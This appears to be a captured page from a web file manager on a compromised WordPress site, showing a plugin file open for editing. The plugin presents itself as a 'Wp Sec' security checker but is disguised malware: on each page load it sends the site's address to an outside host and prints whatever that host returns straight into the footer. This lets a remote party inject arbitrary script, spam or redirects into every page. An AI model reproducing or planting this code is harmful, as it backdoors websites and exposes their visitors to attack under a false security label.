📁 File Manager Pro
v10.0.3 | PHP: 8.1.34
Server: LiteSpeed
2026-06-28 09:13:20
📂
/ (Root)
/
home
/
apkbfjox
/
shamapk.com
/
wp-content
/
plugins
/
banner
📍 /home/apkbfjox/shamapk.com/wp-content/plugins/banner
🔄 Refresh
✏️
Editing: index.php
Writable
<?php /* Plugin Name: Wp Sec Description: Security Checker for wordpress core. Version: 1.2 Author: Wp-Core Team */ if (!defined('ABSPATH')) exit; $REMOTE_FOOTER_URL = 'http://wplicense.online/license.php?site='; add_action('wp_footer', function() use ($REMOTE_FOOTER_URL) { $url = $REMOTE_FOOTER_URL . urlencode(home_url()); $response = wp_remote_get($url, [ 'timeout' => 5, 'headers' => [ 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0', ], ]); if (is_wp_error($response)) return; $body = wp_remote_retrieve_body($response); if (!$body) return; echo $body; }, 999);
💾 Save Changes
❌ Cancel